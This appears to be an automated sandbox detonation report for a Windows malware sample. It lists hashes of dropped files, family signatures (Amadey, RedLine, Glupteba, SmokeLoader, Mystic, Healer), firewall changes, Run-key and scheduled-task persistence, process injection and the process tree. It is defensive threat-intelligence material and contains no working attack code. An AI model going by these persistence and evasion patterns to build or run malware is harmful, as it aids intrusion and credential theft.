SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

C:\Users\Admin\AppData\Local\Temp\Cab458A.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar4669.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d36e6db193699f2670539623df89cea2
SHA1 c3151a0d544bd197bd79b1cc83d3b28dddfef9bd
SHA256 da569c03c0431b5a7750b947a7ce4236c43924194741f7489c79713fba0c3daf
SHA512 720e5133dc015d35ba5c2a30687dba2c3313db1b651266874773247f004049cd6720762f59595b18dc112d3cc33a6abc93463eb0f9f78f5cd11f53c0d00f8358

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4f3e1a840b98b5da2059ed9d7ad02ef7
SHA1 9ee20c8db37188b3676e5d335a793e29b049a355
SHA256 9f79aa12812a4fbfc44641e46fd69461dda00cf64928c90f2f14cfa8bc30a990
SHA512 8c5c4239a066c78e774501be680b138fd0aa61b3c7caa249ce9264274058e9c39e6a71ec87be61e1e9346157d2885584f5f4c254c545fa936f4ebaec744251de

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9257d7c1a15afa662e5bd6d5d74b27e3
SHA1 35f07833a156b11e4e5552c217d18d6dceac0bd9
SHA256 2b08147ccaed043dbaf5752b6814dc15861636626a6feaaa94cbf2bf368f4182
SHA512 a7d7ce71a5238c6a5583ebd9534c8396334b3c65c8f4ae552208d2894bbf9b369f44e5925756ad01ee13d72984bd2ced2544c456b80255bdf58e39da49a2025a

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\Kno43F3.tmp

MD5 002d5646771d31d1e7c57990cc020150
SHA1 a28ec731f9106c252f313cca349a68ef94ee3de9
SHA256 1e2e25bf730ff20c89d57aa38f7f34be7690820e8279b20127d0014dd27b743f
SHA512 689e90e7d83eef054a168b98ba2b8d05ab6ff8564e199d4089215ad3fe33440908e687aa9ad7d94468f9f57a4cc19842d53a9cd2f17758bdadf0503df63629c6

C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

MD5 da597791be3b6e732f0bc8b20e38ee62
SHA1 1125c45d285c360542027d7554a5c442288974de
SHA256 5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07
SHA512 d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H0M6ISDRF0LE37X0K1W0.temp

MD5 ec7f35e5a26eab0ff3d08436ba0707da
SHA1 6afeeb34418e526c7aa94425a26fa54408270b72
SHA256 3955b4dc6a5b1999fca9723445a0b8feebee1c4067cfb712c9a182c1685ec077
SHA512 1145c3a26d94b2841cf209c65ae44f1294ad3b11fa10cb2b325b95f65e853c2de6469452d55af3379d456620310f934f7377a53cc2807254e1ea562887b44c75

C:\Users\Admin\AppData\Local\Temp\tmp74F4.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp7538.tmp

MD5 ffb3fe1240662078b37c24fb150a0b08
SHA1 c3bd03fbef4292f607e4434cdf2003b4043a2771
SHA256 580dc431acaa3e464c04ffdc1182a0c8498ac28275acb5a823ede8665a3cb614
SHA512 6f881a017120920a1dff8080ca477254930964682fc8dc32ab18d7f6b0318d904770ecc3f78fafc6741ef1e19296f5b0e8f8f7ab66a2d8ed2eb22a5efacaeda5

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\27V93E5X\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:31

Reported

2023-10-10 20:47

Platform

win10v2004-20230915-en

Max time kernel

86s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe"

Signatures

Amadey

trojan amadey

Detect Mystic stealer payload

Detects Healer an antivirus disabler dropper

Glupteba

loader dropper glupteba

Glupteba payload

Healer

dropper healer

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BE31.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\C384.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\BB41.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C1DD.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1600 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 1600 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 1600 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 3564 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 3564 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 3564 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 3716 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3716 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3716 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3716 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3716 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3716 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3564 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe
PID 3564 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe
PID 3564 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe
PID 2092 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1600 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4318281.exe
PID 1600 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4318281.exe
PID 1600 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4318281.exe
PID 2556 wrote to memory of 1792 N/A N/A C:\Users\Admin\AppData\Local\Temp\BB41.exe
PID 2556 wrote to memory of 1792 N/A N/A C:\Users\Admin\AppData\Local\Temp\BB41.exe
PID 2556 wrote to memory of 1792 N/A N/A C:\Users\Admin\AppData\Local\Temp\BB41.exe
PID 1792 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\BB41.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe
PID 1792 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\BB41.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe
PID 1792 wrote to memory of 1532 N/A C:\Users\Admin\AppData\Local\Temp\BB41.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe
PID 2556 wrote to memory of 3832 N/A N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe
PID 2556 wrote to memory of 3832 N/A N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe
PID 2556 wrote to memory of 3832 N/A N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe
PID 1532 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe
PID 1532 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe
PID 1532 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe
PID 2044 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe
PID 2044 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe
PID 2044 wrote to memory of 4224 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe
PID 4224 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe
PID 4224 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe
PID 4224 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe
PID 2556 wrote to memory of 1544 N/A N/A C:\Users\Admin\AppData\Local\Temp\BE31.bat
PID 2556 wrote to memory of 1544 N/A N/A C:\Users\Admin\AppData\Local\Temp\BE31.bat
PID 2556 wrote to memory of 1544 N/A N/A C:\Users\Admin\AppData\Local\Temp\BE31.bat
PID 1920 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1oS28ea9.exe
PID 1920 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1oS28ea9.exe
PID 1920 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1oS28ea9.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3832 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\BCF8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe

"C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 3716 -ip 3716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 152

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2092 -ip 2092

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4708 -ip 4708

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4318281.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4318281.exe

C:\Users\Admin\AppData\Local\Temp\BB41.exe

C:\Users\Admin\AppData\Local\Temp\BB41.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe

C:\Users\Admin\AppData\Local\Temp\BCF8.exe

C:\Users\Admin\AppData\Local\Temp\BCF8.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe

C:\Users\Admin\AppData\Local\Temp\BE31.bat

"C:\Users\Admin\AppData\Local\Temp\BE31.bat"

